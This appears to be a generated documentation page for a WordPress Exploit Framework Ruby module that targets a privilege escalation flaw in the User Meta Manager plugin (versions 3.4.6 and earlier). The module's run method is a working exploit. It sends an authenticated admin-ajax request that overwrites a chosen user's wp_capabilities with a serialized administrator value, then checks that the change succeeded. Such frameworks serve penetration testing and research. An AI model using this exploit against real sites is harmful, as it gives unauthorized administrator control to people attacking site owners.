class Wpxf::Auxiliary::UserMetaManagerPrivilegeEscalation
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb, line 6 def initialize super update_info( name: 'User Meta Manager <= 3.4.6 Privilege Escalation', desc: %( The User Meta Manager plugin, up to and including version 3.4.6, allows authenticated users of any level to update the role of any user to be an administrator. ), author: [ 'Panagiotis Vagenas', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['URL', 'http://seclists.org/bugtraq/2016/Feb/34'], ['WPVDB', '8379'] ], date: 'Feb 04 2016' ) register_options([ IntegerOption.new( name: 'user_id', desc: 'The ID of the user to make an admin', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb, line 44 def check check_plugin_version_from_readme('user-meta-manager', '3.4.7') end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb, line 36 def requires_authentication true end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb, line 48 def run return false unless super res = execute_post_request( url: wordpress_url_admin_ajax, params: { 'action' => 'umm_switch_action', 'umm_sub_action' => 'umm_update_user_meta', 'umm_user' => user_id.to_s }, body: { 'mode' => 'edit', 'umm_meta_value[]' => 'a:1:{s:13:"administrator";b:1;}', 'umm_meta_key[]' => 'wp_capabilities' }, cookie: session_cookie ) if res.code == 200 && res.body =~ /Meta data successfully updated/i emit_success "User #{user_id} now has full admin rights" return true else emit_error "Response code: #{res.code}", true emit_error "Response body: #{res.body}", true emit_error 'Failed to escalate privileges' return false end end
user_id()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb, line 40 def user_id normalized_option_value('user_id') end